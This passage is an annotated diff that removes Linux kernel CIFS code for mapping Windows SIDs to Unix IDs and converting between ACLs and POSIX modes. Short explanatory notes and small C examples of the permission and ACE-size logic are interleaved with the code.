+-		rc = -EINVAL;
+-		cifs_dbg(FYI, "%s: Can't map %cid %u to a SID\n",
+-			 __func__, sidtype == SIDOWNER ? 'u' : 'g', cid);
+-		goto out_revert_creds;
+-	} else if (sidkey->datalen < CIFS_SID_BASE_SIZE) {
+-		rc = -EIO;
+-		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu)\n",
+-			 __func__, sidkey->datalen);
+-		goto invalidate_key;
+-	}
+-
+-	/*
+-	 * A sid is usually too large to be embedded in payload.value, but if
+-	 * there are no subauthorities and the host has 8-byte pointers, then
+-	 * it could be.
+-	 */
+-	ksid = sidkey->datalen <= sizeof(sidkey->payload) ?
+-		(struct cifs_sid *)&sidkey->payload :
+-		(struct cifs_sid *)sidkey->payload.data[0];
+-
+-	ksid_size = CIFS_SID_BASE_SIZE + (ksid->num_subauth * sizeof(__le32));
+-	if (ksid_size > sidkey->datalen) {
+-		rc = -EIO;
+-		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu, ksid_size=%u)\n",
+-			 __func__, sidkey->datalen, ksid_size);
+-		goto invalidate_key;
+-	}
+-
+-	cifs_copy_sid(ssid, ksid);
+-out_key_put:
+-	key_put(sidkey);
+-out_revert_creds:
+-	revert_creds(saved_cred);
+-	return rc;
+-
+-invalidate_key:
+-	key_invalidate(sidkey);
+-	goto out_key_put;
+-}
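
The request_key() call above reaches userspace through the request-key(8) upcall mechanism; with cifs-utils installed, the cifs.idmap(8) helper typically resolves these "cifs.idmap" keys. A representative configuration snippet (helper path as commonly shipped by distributions; adjust to the local install):

# /etc/request-key.d/cifs.idmap.conf
create	cifs.idmap	*	*	/usr/sbin/cifs.idmap %k

The override credentials set up in init_cifs_idmap() below ensure these lookups are cached in a private root keyring rather than the calling user's, so a user cannot pre-seed a malicious mapping with add_key().
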
+-
+-int
+-sid_to_id(struct cifs_sb_info *cifs_sb, struct cifs_sid *psid,
+-		struct cifs_fattr *fattr, uint sidtype)
+-{
+-	int rc = 0;
+-	struct key *sidkey;
+-	char *sidstr;
+-	const struct cred *saved_cred;
+-	kuid_t fuid = cifs_sb->ctx->linux_uid;
+-	kgid_t fgid = cifs_sb->ctx->linux_gid;
+-
+-	/*
+-	 * If we have too many subauthorities, then something is really wrong.
+-	 * Just return an error.
+-	 */
+-	if (unlikely(psid->num_subauth > SID_MAX_SUB_AUTHORITIES)) {
+-		cifs_dbg(FYI, "%s: %u subauthorities is too many!\n",
+-			 __func__, psid->num_subauth);
+-		return -EIO;
+-	}
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL) ||
+-	    (cifs_sb_master_tcon(cifs_sb)->posix_extensions)) {
+-		uint32_t unix_id;
+-		bool is_group;
+-
+-		if (sidtype != SIDOWNER)
+-			is_group = true;
+-		else
+-			is_group = false;
+-
+-		if (is_well_known_sid(psid, &unix_id, is_group) == false)
+-			goto try_upcall_to_get_id;
+-
+-		if (is_group) {
+-			kgid_t gid;
+-			gid_t id;
+-
+-			id = (gid_t)unix_id;
+-			gid = make_kgid(&init_user_ns, id);
+-			if (gid_valid(gid)) {
+-				fgid = gid;
+-				goto got_valid_id;
+-			}
+-		} else {
+-			kuid_t uid;
+-			uid_t id;
+-
+-			id = (uid_t)unix_id;
+-			uid = make_kuid(&init_user_ns, id);
+-			if (uid_valid(uid)) {
+-				fuid = uid;
+-				goto got_valid_id;
+-			}
+-		}
+-		/* If unable to find uid/gid easily from SID try via upcall */
+-	}
+-
+-try_upcall_to_get_id:
+-	sidstr = sid_to_key_str(psid, sidtype);
+-	if (!sidstr)
+-		return -ENOMEM;
+-
+-	saved_cred = override_creds(root_cred);
+-	sidkey = request_key(&cifs_idmap_key_type, sidstr, "");
+-	if (IS_ERR(sidkey)) {
+-		cifs_dbg(FYI, "%s: Can't map SID %s to a %cid\n",
+-			 __func__, sidstr, sidtype == SIDOWNER ? 'u' : 'g');
+-		goto out_revert_creds;
+-	}
+-
+-	/*
+-	 * FIXME: Here we assume that uid_t and gid_t are same size. It's
+-	 * probably a safe assumption but might be better to check based on
+-	 * sidtype.
+-	 */
+-	BUILD_BUG_ON(sizeof(uid_t) != sizeof(gid_t));
+-	if (sidkey->datalen != sizeof(uid_t)) {
+-		cifs_dbg(FYI, "%s: Downcall contained malformed key (datalen=%hu)\n",
+-			 __func__, sidkey->datalen);
+-		key_invalidate(sidkey);
+-		goto out_key_put;
+-	}
+-
+-	if (sidtype == SIDOWNER) {
+-		kuid_t uid;
+-		uid_t id;
+-		memcpy(&id, &sidkey->payload.data[0], sizeof(uid_t));
+-		uid = make_kuid(&init_user_ns, id);
+-		if (uid_valid(uid))
+-			fuid = uid;
+-	} else {
+-		kgid_t gid;
+-		gid_t id;
+-		memcpy(&id, &sidkey->payload.data[0], sizeof(gid_t));
+-		gid = make_kgid(&init_user_ns, id);
+-		if (gid_valid(gid))
+-			fgid = gid;
+-	}
+-
+-out_key_put:
+-	key_put(sidkey);
+-out_revert_creds:
+-	revert_creds(saved_cred);
+-	kfree(sidstr);
+-
+-	/*
+-	 * Note that we return 0 here unconditionally. If the mapping
+-	 * fails then we just fall back to using the ctx->linux_uid/linux_gid.
+-	 */
+-got_valid_id:
+-	rc = 0;
+-	if (sidtype == SIDOWNER)
+-		fattr->cf_uid = fuid;
+-	else
+-		fattr->cf_gid = fgid;
+-	return rc;
+-}
+-
+-int
+-init_cifs_idmap(void)
+-{
+-	struct cred *cred;
+-	struct key *keyring;
+-	int ret;
+-
+-	cifs_dbg(FYI, "Registering the %s key type\n",
+-		 cifs_idmap_key_type.name);
+-
+-	/* create an override credential set with a special thread keyring in
+-	 * which requests are cached
+-	 *
+-	 * this is used to prevent malicious redirections from being installed
+-	 * with add_key().
+-	 */
+-	cred = prepare_kernel_cred(NULL);
+-	if (!cred)
+-		return -ENOMEM;
+-
+-	keyring = keyring_alloc(".cifs_idmap",
+-				GLOBAL_ROOT_UID, GLOBAL_ROOT_GID, cred,
+-				(KEY_POS_ALL & ~KEY_POS_SETATTR) |
+-				KEY_USR_VIEW | KEY_USR_READ,
+-				KEY_ALLOC_NOT_IN_QUOTA, NULL, NULL);
+-	if (IS_ERR(keyring)) {
+-		ret = PTR_ERR(keyring);
+-		goto failed_put_cred;
+-	}
+-
+-	ret = register_key_type(&cifs_idmap_key_type);
+-	if (ret < 0)
+-		goto failed_put_key;
+-
+-	/* instruct request_key() to use this special keyring as a cache for
+-	 * the results it looks up */
+-	set_bit(KEY_FLAG_ROOT_CAN_CLEAR, &keyring->flags);
+-	cred->thread_keyring = keyring;
+-	cred->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
+-	root_cred = cred;
+-
+-	cifs_dbg(FYI, "cifs idmap keyring: %d\n", key_serial(keyring));
+-	return 0;
+-
+-failed_put_key:
+-	key_put(keyring);
+-failed_put_cred:
+-	put_cred(cred);
+-	return ret;
+-}
+-
+-void
+-exit_cifs_idmap(void)
+-{
+-	key_revoke(root_cred->thread_keyring);
+-	unregister_key_type(&cifs_idmap_key_type);
+-	put_cred(root_cred);
+-	cifs_dbg(FYI, "Unregistered %s key type\n", cifs_idmap_key_type.name);
+-}
+-
+-/* copy ntsd, owner sid, and group sid from a security descriptor to another */
+-static __u32 copy_sec_desc(const struct cifs_ntsd *pntsd,
+-				struct cifs_ntsd *pnntsd,
+-				__u32 sidsoffset,
+-				struct cifs_sid *pownersid,
+-				struct cifs_sid *pgrpsid)
+-{
+-	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct cifs_sid *nowner_sid_ptr, *ngroup_sid_ptr;
+-
+-	/* copy security descriptor control portion */
+-	pnntsd->revision = pntsd->revision;
+-	pnntsd->type = pntsd->type;
+-	pnntsd->dacloffset = cpu_to_le32(sizeof(struct cifs_ntsd));
+-	pnntsd->sacloffset = 0;
+-	pnntsd->osidoffset = cpu_to_le32(sidsoffset);
+-	pnntsd->gsidoffset = cpu_to_le32(sidsoffset + sizeof(struct cifs_sid));
+-
+-	/* copy owner sid */
+-	if (pownersid)
+-		owner_sid_ptr = pownersid;
+-	else
+-		owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-				le32_to_cpu(pntsd->osidoffset));
+-	nowner_sid_ptr = (struct cifs_sid *)((char *)pnntsd + sidsoffset);
+-	cifs_copy_sid(nowner_sid_ptr, owner_sid_ptr);
+-
+-	/* copy group sid */
+-	if (pgrpsid)
+-		group_sid_ptr = pgrpsid;
+-	else
+-		group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-				le32_to_cpu(pntsd->gsidoffset));
+-	ngroup_sid_ptr = (struct cifs_sid *)((char *)pnntsd + sidsoffset +
+-					sizeof(struct cifs_sid));
+-	cifs_copy_sid(ngroup_sid_ptr, group_sid_ptr);
+-
+-	return sidsoffset + (2 * sizeof(struct cifs_sid));
+-}
+-
+-
+-/*
+-   Change the POSIX mode to reflect the ACE permissions.
+-   pmode is the existing mode (we only want to overwrite part of it);
+-   the bits to set can be S_IRWXU, S_IRWXG or S_IRWXO, i.e. 00700,
+-   00070 or 00007.
+-*/
+-static void access_flags_to_mode(__le32 ace_flags, int type, umode_t *pmode,
+-				 umode_t *pdenied, umode_t mask)
+-{
+-	__u32 flags = le32_to_cpu(ace_flags);
+-	/*
+-	 * Do not assume "preferred" or "canonical" order.
+-	 * The first DENY or ALLOW ACE which matches perfectly is
+-	 * the permission to be used. Once allowed or denied, same
+-	 * permission in later ACEs do not matter.
+-	 */
+-
+-	/* If not already allowed, deny these bits */
+-	if (type == ACCESS_DENIED) {
+-		if (flags & GENERIC_ALL &&
+-				!(*pmode & mask & 0777))
+-			*pdenied |= mask & 0777;
+-
+-		if (((flags & GENERIC_WRITE) ||
+-				((flags & FILE_WRITE_RIGHTS) == FILE_WRITE_RIGHTS)) &&
+-				!(*pmode & mask & 0222))
+-			*pdenied |= mask & 0222;
+-
+-		if (((flags & GENERIC_READ) ||
+-				((flags & FILE_READ_RIGHTS) == FILE_READ_RIGHTS)) &&
+-				!(*pmode & mask & 0444))
+-			*pdenied |= mask & 0444;
+-
+-		if (((flags & GENERIC_EXECUTE) ||
+-				((flags & FILE_EXEC_RIGHTS) == FILE_EXEC_RIGHTS)) &&
+-				!(*pmode & mask & 0111))
+-			*pdenied |= mask & 0111;
+-
+-		return;
+-	} else if (type != ACCESS_ALLOWED) {
+-		cifs_dbg(VFS, "unknown access control type %d\n", type);
+-		return;
+-	}
+-	/* else ACCESS_ALLOWED type */
+-
+-	if ((flags & GENERIC_ALL) &&
+-			!(*pdenied & mask & 0777)) {
+-		*pmode |= mask & 0777;
+-		cifs_dbg(NOISY, "all perms\n");
+-		return;
+-	}
+-
+-	if (((flags & GENERIC_WRITE) ||
+-			((flags & FILE_WRITE_RIGHTS) == FILE_WRITE_RIGHTS)) &&
+-			!(*pdenied & mask & 0222))
+-		*pmode |= mask & 0222;
+-
+-	if (((flags & GENERIC_READ) ||
+-			((flags & FILE_READ_RIGHTS) == FILE_READ_RIGHTS)) &&
+-			!(*pdenied & mask & 0444))
+-		*pmode |= mask & 0444;
+-
+-	if (((flags & GENERIC_EXECUTE) ||
+-			((flags & FILE_EXEC_RIGHTS) == FILE_EXEC_RIGHTS)) &&
+-			!(*pdenied & mask & 0111))
+-		*pmode |= mask & 0111;
+-
+-	/* If DELETE_CHILD is set only on an owner ACE, set sticky bit */
+-	if (flags & FILE_DELETE_CHILD) {
+-		if (mask == ACL_OWNER_MASK) {
+-			if (!(*pdenied & 01000))
+-				*pmode |= 01000;
+-		} else if (!(*pdenied & 01000)) {
+-			*pmode &= ~01000;
+-			*pdenied |= 01000;
+-		}
+-	}
+-
+-	cifs_dbg(NOISY, "access flags 0x%x mode now %04o\n", flags, *pmode);
+-	return;
+-}
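
The pmode/pdenied pair gives first-match-wins semantics per permission class: a DENY recorded by an earlier ACE blocks grants from later ALLOW ACEs. A toy trace, assuming an owner DENY-write ACE followed by an owner ALLOW GENERIC_ALL ACE (the blanket 0777 grant is skipped because a bit is already denied, so the per-class checks run instead, exactly as in the function above):

#include <stdio.h>

#define ACL_OWNER_MASK 0700

int main(void)
{
	unsigned int pmode = 0, pdenied = 0, mask = ACL_OWNER_MASK;

	/* ACE 1: DENY owner write; not yet allowed, so record the denial */
	if (!(pmode & mask & 0222))
		pdenied |= mask & 0222;

	/* ACE 2: ALLOW owner GENERIC_ALL, applied class by class */
	if (!(pdenied & mask & 0444))
		pmode |= mask & 0444;
	if (!(pdenied & mask & 0222))
		pmode |= mask & 0222;	/* skipped: write already denied */
	if (!(pdenied & mask & 0111))
		pmode |= mask & 0111;

	printf("owner bits: %03o\n", pmode & mask);	/* prints 500 */
	return 0;
}
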
+-
+-/*
+-   Generate access flags to reflect the permissions; mode is the existing mode.
+-   This function is called for every ACE in the DACL whose SID matches
+-   the owner, the group, or everyone.
+-*/
+-
+-static void mode_to_access_flags(umode_t mode, umode_t bits_to_use,
+-				__u32 *pace_flags)
+-{
+-	/* reset access mask */
+-	*pace_flags = 0x0;
+-
+-	/* bits to use are either S_IRWXU or S_IRWXG or S_IRWXO */
+-	mode &= bits_to_use;
+-
+-	/* check for R/W/X UGO since we do not know whose flags
+-	   is this but we have cleared all the bits sans RWX for
+-	   either user or group or other as per bits_to_use */
+-	if (mode & S_IRUGO)
+-		*pace_flags |= SET_FILE_READ_RIGHTS;
+-	if (mode & S_IWUGO)
+-		*pace_flags |= SET_FILE_WRITE_RIGHTS;
+-	if (mode & S_IXUGO)
+-		*pace_flags |= SET_FILE_EXEC_RIGHTS;
+-
+-	cifs_dbg(NOISY, "mode: %04o, access flags now 0x%x\n",
+-		 mode, *pace_flags);
+-	return;
+-}
+-
+-static __u16 cifs_copy_ace(struct cifs_ace *dst, struct cifs_ace *src, struct cifs_sid *psid)
+-{
+-	__u16 size = 1 + 1 + 2 + 4;
+-
+-	dst->type = src->type;
+-	dst->flags = src->flags;
+-	dst->access_req = src->access_req;
+-
+-	/* Check if there's a replacement sid specified */
+-	if (psid)
+-		size += cifs_copy_sid(&dst->sid, psid);
+-	else
+-		size += cifs_copy_sid(&dst->sid, &src->sid);
+-
+-	dst->size = cpu_to_le16(size);
+-
+-	return size;
+-}
+-
+-static __u16 fill_ace_for_sid(struct cifs_ace *pntace,
+-			const struct cifs_sid *psid, __u64 nmode,
+-			umode_t bits, __u8 access_type,
+-			bool allow_delete_child)
+-{
+-	int i;
+-	__u16 size = 0;
+-	__u32 access_req = 0;
+-
+-	pntace->type = access_type;
+-	pntace->flags = 0x0;
+-	mode_to_access_flags(nmode, bits, &access_req);
+-
+-	if (access_type == ACCESS_ALLOWED && allow_delete_child)
+-		access_req |= FILE_DELETE_CHILD;
+-
+-	if (access_type == ACCESS_ALLOWED && !access_req)
+-		access_req = SET_MINIMUM_RIGHTS;
+-	else if (access_type == ACCESS_DENIED)
+-		access_req &= ~SET_MINIMUM_RIGHTS;
+-
+-	pntace->access_req = cpu_to_le32(access_req);
+-
+-	pntace->sid.revision = psid->revision;
+-	pntace->sid.num_subauth = psid->num_subauth;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] = psid->authority[i];
+-	for (i = 0; i < psid->num_subauth; i++)
+-		pntace->sid.sub_auth[i] = psid->sub_auth[i];
+-
+-	size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth * 4);
+-	pntace->size = cpu_to_le16(size);
+-
+-	return size;
+-}
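
The literal sizes used here and in the setup_*_ACE() helpers below are just the fixed ACE header (type, flags, size, access mask) plus a SID with n sub-authorities. A quick sanity check of that arithmetic:

#include <assert.h>

/* Fixed ACE header plus a SID with num_subauth sub-authorities. */
static unsigned short ace_size(unsigned char num_subauth)
{
	unsigned short sid = 1 + 1 + 6 + 4u * num_subauth;
	return 1 + 1 + 2 + 4 + sid;
}

int main(void)
{
	assert(ace_size(1) == 20);	/* the authusers ACE below */
	assert(ace_size(3) == 28);	/* the S-1-5-88-x ACEs below */
	return 0;
}
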
+-
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-static void dump_ace(struct cifs_ace *pace, char *end_of_acl)
+-{
+-	int num_subauth;
+-
+-	/* validate that we do not go past end of acl */
+-
+-	if (le16_to_cpu(pace->size) < 16) {
+-		cifs_dbg(VFS, "ACE too small %d\n", le16_to_cpu(pace->size));
+-		return;
+-	}
+-
+-	if (end_of_acl < (char *)pace + le16_to_cpu(pace->size)) {
+-		cifs_dbg(VFS, "ACL too small to parse ACE\n");
+-		return;
+-	}
+-
+-	num_subauth = pace->sid.num_subauth;
+-	if (num_subauth) {
+-		int i;
+-		cifs_dbg(FYI, "ACE revision %d num_auth %d type %d flags %d size %d\n",
+-			 pace->sid.revision, pace->sid.num_subauth, pace->type,
+-			 pace->flags, le16_to_cpu(pace->size));
+-		for (i = 0; i < num_subauth; ++i) {
+-			cifs_dbg(FYI, "ACE sub_auth[%d]: 0x%x\n",
+-				 i, le32_to_cpu(pace->sid.sub_auth[i]));
+-		}
+-
+-		/* BB add length check to make sure that we do not have huge
+-			num auths and therefore go off the end */
+-	}
+-
+-	return;
+-}
+-#endif
+-
+-static void parse_dacl(struct cifs_acl *pdacl, char *end_of_acl,
+-		       struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
+-		       struct cifs_fattr *fattr, bool mode_from_special_sid)
+-{
+-	int i;
+-	int num_aces = 0;
+-	int acl_size;
+-	char *acl_base;
+-	struct cifs_ace **ppace;
+-
+-	/* BB need to add parm so we can store the SID BB */
+-
+-	if (!pdacl) {
+-		/* no DACL in the security descriptor, set
+-		   all the permissions for user/group/other */
+-		fattr->cf_mode |= 0777;
+-		return;
+-	}
+-
+-	/* validate that we do not go past end of acl */
+-	if (end_of_acl < (char *)pdacl + le16_to_cpu(pdacl->size)) {
+-		cifs_dbg(VFS, "ACL too small to parse DACL\n");
+-		return;
+-	}
+-
+-	cifs_dbg(NOISY, "DACL revision %d size %d num aces %d\n",
+-		 le16_to_cpu(pdacl->revision), le16_to_cpu(pdacl->size),
+-		 le32_to_cpu(pdacl->num_aces));
+-
+-	/* reset rwx permissions for user/group/other.
+-	   Also, if num_aces is 0 i.e. DACL has no ACEs,
+-	   user/group/other have no permissions */
+-	fattr->cf_mode &= ~(0777);
+-
+-	acl_base = (char *)pdacl;
+-	acl_size = sizeof(struct cifs_acl);
+-
+-	num_aces = le32_to_cpu(pdacl->num_aces);
+-	if (num_aces > 0) {
+-		umode_t denied_mode = 0;
+-
+-		if (num_aces > ULONG_MAX / sizeof(struct cifs_ace *))
+-			return;
+-		ppace = kmalloc_array(num_aces, sizeof(struct cifs_ace *),
+-				      GFP_KERNEL);
+-		if (!ppace)
+-			return;
+-
+-		for (i = 0; i < num_aces; ++i) {
+-			ppace[i] = (struct cifs_ace *) (acl_base + acl_size);
+-#ifdef CONFIG_CIFS_DEBUG2
+-			dump_ace(ppace[i], end_of_acl);
+-#endif
+-			if (mode_from_special_sid &&
+-			    (compare_sids(&(ppace[i]->sid),
+-					  &sid_unix_NFS_mode) == 0)) {
+-				/*
+-				 * Full permissions are:
+-				 * 07777 = S_ISUID | S_ISGID | S_ISVTX |
+-				 *         S_IRWXU | S_IRWXG | S_IRWXO
+-				 */
+-				fattr->cf_mode &= ~07777;
+-				fattr->cf_mode |=
+-					le32_to_cpu(ppace[i]->sid.sub_auth[2]);
+-				break;
+-			} else {
+-				if (compare_sids(&(ppace[i]->sid), pownersid) == 0) {
+-					access_flags_to_mode(ppace[i]->access_req,
+-							ppace[i]->type,
+-							&fattr->cf_mode,
+-							&denied_mode,
+-							ACL_OWNER_MASK);
+-				} else if (compare_sids(&(ppace[i]->sid), pgrpsid) == 0) {
+-					access_flags_to_mode(ppace[i]->access_req,
+-							ppace[i]->type,
+-							&fattr->cf_mode,
+-							&denied_mode,
+-							ACL_GROUP_MASK);
+-				} else if ((compare_sids(&(ppace[i]->sid), &sid_everyone) == 0) ||
+-						(compare_sids(&(ppace[i]->sid), &sid_authusers) == 0)) {
+-					access_flags_to_mode(ppace[i]->access_req,
+-							ppace[i]->type,
+-							&fattr->cf_mode,
+-							&denied_mode,
+-							ACL_EVERYONE_MASK);
+-				}
+-			}
+-
+-
+-/*			memcpy((void *)(&(cifscred->aces[i])),
+-				(void *)ppace[i],
+-				sizeof(struct cifs_ace)); */
+-
+-			acl_base = (char *)ppace[i];
+-			acl_size = le16_to_cpu(ppace[i]->size);
+-		}
+-
+-		kfree(ppace);
+-	}
+-
+-	return;
+-}
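
parse_dacl() advances through the DACL by each ACE's self-declared size rather than a fixed stride, since SIDs are variable length. A stripped-down, host-endian sketch of that walk (structures abbreviated from cifsacl.h; the real code validates against end_of_acl via dump_ace() and uses le16_to_cpu on the sizes):

#include <stdint.h>

struct acl_hdr { uint16_t revision, size; uint32_t num_aces; } __attribute__((packed));
struct ace_hdr { uint8_t type, flags; uint16_t size; uint32_t access_req; } __attribute__((packed));

static void walk_aces(struct acl_hdr *acl, char *end,
		      void (*visit)(struct ace_hdr *))
{
	char *p = (char *)acl + sizeof(*acl);
	uint32_t i;

	for (i = 0; i < acl->num_aces; i++) {
		struct ace_hdr *ace = (struct ace_hdr *)p;

		if (p + sizeof(*ace) > end || ace->size < sizeof(*ace) ||
		    p + ace->size > end)
			break;		/* truncated or corrupt ACL: stop */
		visit(ace);
		p += ace->size;		/* each ACE declares its own length */
	}
}
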
+-
+-unsigned int setup_authusers_ACE(struct cifs_ace *pntace)
+-{
+-	int i;
+-	unsigned int ace_size = 20;
+-
+-	pntace->type = ACCESS_ALLOWED_ACE_TYPE;
+-	pntace->flags = 0x0;
+-	pntace->access_req = cpu_to_le32(GENERIC_ALL);
+-	pntace->sid.num_subauth = 1;
+-	pntace->sid.revision = 1;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] =  sid_authusers.authority[i];
+-
+-	pntace->sid.sub_auth[0] =  sid_authusers.sub_auth[0];
+-
+-	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
+-	pntace->size = cpu_to_le16(ace_size);
+-	return ace_size;
+-}
+-
+-/*
+- * Fill in the special SID based on the mode. See
+- * https://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
+- */
+-unsigned int setup_special_mode_ACE(struct cifs_ace *pntace, __u64 nmode)
+-{
+-	int i;
+-	unsigned int ace_size = 28;
+-
+-	pntace->type = ACCESS_DENIED_ACE_TYPE;
+-	pntace->flags = 0x0;
+-	pntace->access_req = 0;
+-	pntace->sid.num_subauth = 3;
+-	pntace->sid.revision = 1;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] = sid_unix_NFS_mode.authority[i];
+-
+-	pntace->sid.sub_auth[0] = sid_unix_NFS_mode.sub_auth[0];
+-	pntace->sid.sub_auth[1] = sid_unix_NFS_mode.sub_auth[1];
+-	pntace->sid.sub_auth[2] = cpu_to_le32(nmode & 07777);
+-
+-	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
+-	pntace->size = cpu_to_le16(ace_size);
+-	return ace_size;
+-}
+-
+-unsigned int setup_special_user_owner_ACE(struct cifs_ace *pntace)
+-{
+-	int i;
+-	unsigned int ace_size = 28;
+-
+-	pntace->type = ACCESS_ALLOWED_ACE_TYPE;
+-	pntace->flags = 0x0;
+-	pntace->access_req = cpu_to_le32(GENERIC_ALL);
+-	pntace->sid.num_subauth = 3;
+-	pntace->sid.revision = 1;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] = sid_unix_NFS_users.authority[i];
+-
+-	pntace->sid.sub_auth[0] = sid_unix_NFS_users.sub_auth[0];
+-	pntace->sid.sub_auth[1] = sid_unix_NFS_users.sub_auth[1];
+-	pntace->sid.sub_auth[2] = cpu_to_le32(current_fsgid().val);
+-
+-	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
+-	pntace->size = cpu_to_le16(ace_size);
+-	return ace_size;
+-}
+-
+-static void populate_new_aces(char *nacl_base,
+-		struct cifs_sid *pownersid,
+-		struct cifs_sid *pgrpsid,
+-		__u64 *pnmode, u32 *pnum_aces, u16 *pnsize,
+-		bool modefromsid)
+-{
+-	__u64 nmode;
+-	u32 num_aces = 0;
+-	u16 nsize = 0;
+-	__u64 user_mode;
+-	__u64 group_mode;
+-	__u64 other_mode;
+-	__u64 deny_user_mode = 0;
+-	__u64 deny_group_mode = 0;
+-	bool sticky_set = false;
+-	struct cifs_ace *pnntace = NULL;
+-
+-	nmode = *pnmode;
+-	num_aces = *pnum_aces;
+-	nsize = *pnsize;
+-
+-	if (modefromsid) {
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += setup_special_mode_ACE(pnntace, nmode);
+-		num_aces++;
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += setup_authusers_ACE(pnntace);
+-		num_aces++;
+-		goto set_size;
+-	}
+-
+-	/*
+-	 * We'll try to keep the mode as requested by the user.
+-	 * But in cases where we cannot meaningfully convert that
+-	 * into ACL, return back the updated mode, so that it is
+-	 * updated in the inode.
+-	 */
+-
+-	if (!memcmp(pownersid, pgrpsid, sizeof(struct cifs_sid))) {
+-		/*
+-		 * Case when owner and group SIDs are the same.
+-		 * Set the more restrictive of the two modes.
+-		 */
+-		user_mode = nmode & (nmode << 3) & 0700;
+-		group_mode = nmode & (nmode >> 3) & 0070;
+-	} else {
+-		user_mode = nmode & 0700;
+-		group_mode = nmode & 0070;
+-	}
+-
+-	other_mode = nmode & 0007;
+-
+-	/* We need a DENY ACE when the perms are more restrictive than those granted by the later ACEs. */
+-	deny_user_mode = ~(user_mode) & ((group_mode << 3) | (other_mode << 6)) & 0700;
+-	deny_group_mode = ~(group_mode) & (other_mode << 3) & 0070;
+-
+-	*pnmode = user_mode | group_mode | other_mode | (nmode & ~0777);
+-
+-	/* This tells if we should allow delete child for group and everyone. */
+-	if (nmode & 01000)
+-		sticky_set = true;
+-
+-	if (deny_user_mode) {
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += fill_ace_for_sid(pnntace, pownersid, deny_user_mode,
+-				0700, ACCESS_DENIED, false);
+-		num_aces++;
+-	}
+-
+-	/* Group DENY ACE does not conflict with owner ALLOW ACE. Keep in preferred order*/
+-	if (deny_group_mode && !(deny_group_mode & (user_mode >> 3))) {
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += fill_ace_for_sid(pnntace, pgrpsid, deny_group_mode,
+-				0070, ACCESS_DENIED, false);
+-		num_aces++;
+-	}
+-
+-	pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-	nsize += fill_ace_for_sid(pnntace, pownersid, user_mode,
+-			0700, ACCESS_ALLOWED, true);
+-	num_aces++;
+-
+-	/* Group DENY ACE conflicts with owner ALLOW ACE. So keep it after. */
+-	if (deny_group_mode && (deny_group_mode & (user_mode >> 3))) {
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += fill_ace_for_sid(pnntace, pgrpsid, deny_group_mode,
+-				0070, ACCESS_DENIED, false);
+-		num_aces++;
+-	}
+-
+-	pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-	nsize += fill_ace_for_sid(pnntace, pgrpsid, group_mode,
+-			0070, ACCESS_ALLOWED, !sticky_set);
+-	num_aces++;
+-
+-	pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-	nsize += fill_ace_for_sid(pnntace, &sid_everyone, other_mode,
+-			0007, ACCESS_ALLOWED, !sticky_set);
+-	num_aces++;
+-
+-set_size:
+-	*pnum_aces = num_aces;
+-	*pnsize = nsize;
+-}
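
The deny-mask expressions above deserve a worked example. For mode 0460 the owner lacks write while the group has it; because the owner also matches the later group/everyone ALLOW ACEs, a preceding owner DENY ACE is required (which is also why the function emits DENY ACEs ahead of the corresponding ALLOWs):

#include <stdio.h>

int main(void)
{
	unsigned int nmode = 0460;
	unsigned int user  = nmode & 0700;	/* 0400 */
	unsigned int group = nmode & 0070;	/* 0060 */
	unsigned int other = nmode & 0007;	/* 0000 */

	unsigned int deny_user  = ~user  & ((group << 3) | (other << 6)) & 0700;
	unsigned int deny_group = ~group & (other << 3) & 0070;

	/* deny_user=0200: deny owner write ahead of the group ALLOW */
	printf("deny_user=%03o deny_group=%03o\n", deny_user, deny_group);
	return 0;
}
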
+-
+-static __u16 replace_sids_and_copy_aces(struct cifs_acl *pdacl, struct cifs_acl *pndacl,
+-		struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
+-		struct cifs_sid *pnownersid, struct cifs_sid *pngrpsid)
+-{
+-	int i;
+-	u16 size = 0;
+-	struct cifs_ace *pntace = NULL;
+-	char *acl_base = NULL;
+-	u32 src_num_aces = 0;
+-	u16 nsize = 0;
+-	struct cifs_ace *pnntace = NULL;
+-	char *nacl_base = NULL;
+-	u16 ace_size = 0;
+-
+-	acl_base = (char *)pdacl;
+-	size = sizeof(struct cifs_acl);
+-	src_num_aces = le32_to_cpu(pdacl->num_aces);
+-
+-	nacl_base = (char *)pndacl;
+-	nsize = sizeof(struct cifs_acl);
+-
+-	/* Go through all the ACEs */
+-	for (i = 0; i < src_num_aces; ++i) {
+-		pntace = (struct cifs_ace *) (acl_base + size);
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-
+-		if (pnownersid && compare_sids(&pntace->sid, pownersid) == 0)
+-			ace_size = cifs_copy_ace(pnntace, pntace, pnownersid);
+-		else if (pngrpsid && compare_sids(&pntace->sid, pgrpsid) == 0)
+-			ace_size = cifs_copy_ace(pnntace, pntace, pngrpsid);
+-		else
+-			ace_size = cifs_copy_ace(pnntace, pntace, NULL);
+-
+-		size += le16_to_cpu(pntace->size);
